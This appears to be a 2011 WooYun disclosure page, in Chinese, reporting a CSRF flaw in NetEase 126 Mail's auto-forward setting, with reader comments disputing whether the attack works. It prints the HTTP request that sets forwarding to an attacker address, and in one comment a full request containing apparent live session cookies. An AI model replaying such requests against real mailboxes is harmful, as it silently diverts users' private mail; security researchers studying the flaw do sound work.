漏洞概要
关注数(24)
关注此漏洞
漏洞标题:网易邮箱CSRF漏洞
相关厂商:网易
提交时间:2011-05-09 16:14
修复时间:2011-05-14 18:00
公开时间:2011-05-14 18:00
漏洞类型:CSRF
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2011-05-09: 细节已通知厂商并且等待厂商处理中
2011-05-14: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
犹豫了很久要不要把这个给爆出来,毕竟影响太大了……
详细说明:
网易邮箱有个很强大的功能叫做“自动转发”,然后这个功能没有做CSRF预防。
看看设置转发的http包吧:
GET /autofw/fwto.do?sid=XXXXXXXXXXXXXXXXXXXXXXXXX&forwarddes=hacker@hacker.com&keeplocal=1&callback=MM.autofwd.valCallback HTTP/1.1
Host: config.mail.126.com
Referer: http://g4a32.mail.126.com/a/j/dm3/index.jsp?sid=XXXXXXXXXXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: *****
看上去貌似要带sid (session id),但是网易的sid是在url里的,换句话说通过http referer就拿到了。接下来可以做的事情就好容易……
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2011-05-14 18:00
厂商回复:
漏洞Rank:12 (WooYun评价)
最新状态:
暂无
漏洞评价:
评论
-
2011-05-09 16:44 |
Joey Yin ( 实习白帽子 | Rank:60 漏洞数:5 )
-
2011-05-09 17:03 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2011-05-09 17:08 |
Joey Yin ( 实习白帽子 | Rank:60 漏洞数:5 )
好玩的就在这儿,网易的修复方式不是面对csrf而是加了一个sid作为authentication validation key,殊不知这个sid第三方是可以通过referer拿到的。通过这个方式,我可以结合社工攻击拿到我想要的对象的所有新邮件信息。
-
2011-05-09 17:23 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2011-05-11 13:07 |
anyunix ( 实习白帽子 | Rank:86 漏洞数:8 | 号被盗。)
看不到漏洞说的啥,但是,如果你们说的是通过referer获取sid构造CSRF那就错了。referer的sid是加密过了的。而非发邮件需要的sid。这里的漏洞并不存在。
-
2011-05-11 13:13 |
anyunix ( 实习白帽子 | Rank:86 漏洞数:8 | 号被盗。)
话说,即使有,一个POST提交的CSRF,值rank20 ???
-
2011-05-11 13:30 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2011-05-13 12:03 |
p.z ( 普通白帽子 | Rank:411 漏洞数:40 )
-
2011-05-13 12:07 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
@_@ 请讲,是说所有的都不需要点连接还是说这个问题
-
2011-05-14 18:09 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2011-05-14 21:08 |
p.z ( 普通白帽子 | Rank:411 漏洞数:40 )
referer取到的sid不是exp需要的sid,没用....
-
2011-05-14 21:13 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2011-05-14 22:37 |
sec87 ( 实习白帽子 | Rank:54 漏洞数:7 | 9999999999999999999999999999999999999999...)
pz意思估计是单从技术上自动POST可以JS简单实现,XSSER意思是网易邮箱米有XSS情况下需要点链接
-
2011-05-14 23:48 |
p.z ( 普通白帽子 | Rank:411 漏洞数:40 )
不是,我意思是post不单单可以用js去实现,还可以用flash,而且通常对flash的限制比对js的限制要小很多.
-
2011-05-16 14:58 |
Joey Yin ( 实习白帽子 | Rank:60 漏洞数:5 )
我是此漏洞作者,关于官方回应,我只能说大家可以自己去看看网易126邮箱设置自动转发的http包。sid确实是一个。GET /autofw/fwto.do?sid=TAvpYxJqRQlNpGCKOkqqdNVBEvKjvnaJ&forwarddes=xxxwooyunorg@gmail.com&keeplocal=1&callback=MM.autofwd.valCallback HTTP/1.1Host: config.mail.126.comReferer: http://g3a19.mail.126.com/a/j/dm3/index.jsp?sid=TAvpYxJqRQlNpGCKOkqqdNVBEvKjvnaJUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24Accept: */*Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3Cookie: _ntes_nnid=cb3b2eb6205c14913afb86145fbb1e07,0; ntes_mail_firstpage=normal; logType=df; nts_mail_user=aenjoy:-1:1; NETEASE_SSN=aenjoy; starttime=1305522486235; NTES_SESS=5V4T9lLf.RS9UMeLR6wbW6I1TF4hczFbHg6A2f__mrJFDDJYikaS4yaGmSVoxQcDeslYUp5ys_IckFgmgcudA6Mk3s3HP8Clj1JilkwCiHpIa; S_INFO=1305522500|0|#1&25#|aenjoy@126.com; P_INFO=aenjoy@126.com|1305522500|0|mail126|11&23|sic&1305367732&mail126#sic&510100#10|&0; Coremail=1305522500858%TAvpYxJqRQlNpGCKOkqqdNVBEvKjvnaJ%g3a19.mail.126.com; MAIL_MISC="aenjoy@126.com"; cm_last_info=dT1hZW5qb3klNDAxMjYuY29tJmQ9aHR0cCUzQSUyRiUyRmczYTE5Lm1haWwuMTI2LmNvbSUyRmElMkZqJTJGZG0zJTJGbWFpbi5qc3AlM0ZzaWQlM0RUQXZwWXhKcVJRbE5wR0NLT2txcWROVkJFdktqdm5hSiZzPVRBdnBZeEpxUlFsTnBHQ0tPa3FxZE5WQkV2S2p2bmFKJmg9aHR0cCUzQSUyRiUyRmczYTE5Lm1haWwuMTI2LmNvbSUyRmElMkZqJTJGZG0zJTJGbWFpbi5qc3AlM0ZzaWQlM0RUQXZwWXhKcVJRbE5wR0NLT2txcWROVkJFdktqdm5hSiZ3PWczYTE5Lm1haWwuMTI2LmNvbSZsPS0xJnQ9LTEmdj0w; mail_style=dm3; mail_uid=xxxxwoo111@126.com; mail_host=g3a19.mail.126.com; MAIL126_SSN=xxxxwoo111; cm_newmsg=user%3Dxxxxwoo111%40126.com%26new%3D1413%26total%3D3184
-
2011-05-16 17:33 |
anyunix ( 实习白帽子 | Rank:86 漏洞数:8 | 号被盗。)
楼上想说明什么?这里referer没意义。点击时第三方站获取到的referer中参数叫ssid。
-
2011-06-24 14:01 |
blubit ( 路人 | Rank:0 漏洞数:1 | 大家好,我是blubit)
厂商忽略。。。。这个回复有点不好让人接受这个漏洞的风险蛮高的。
-
2011-07-06 10:00 |
sec87 ( 实习白帽子 | Rank:54 漏洞数:7 | 9999999999999999999999999999999999999999...)
问题:SID是在URL里的,单个邮件里的是SSID,无法获取SID,可通过XSS任意MAIL下XSS获取COOKIE中REG出SID值.调用接口实现希望实现地功能,如那个啥啥啥.
-
2011-07-09 19:21 |
ˉ黑色.小亮 ( 路人 | Rank:3 漏洞数:2 | 精通系统开机与关机)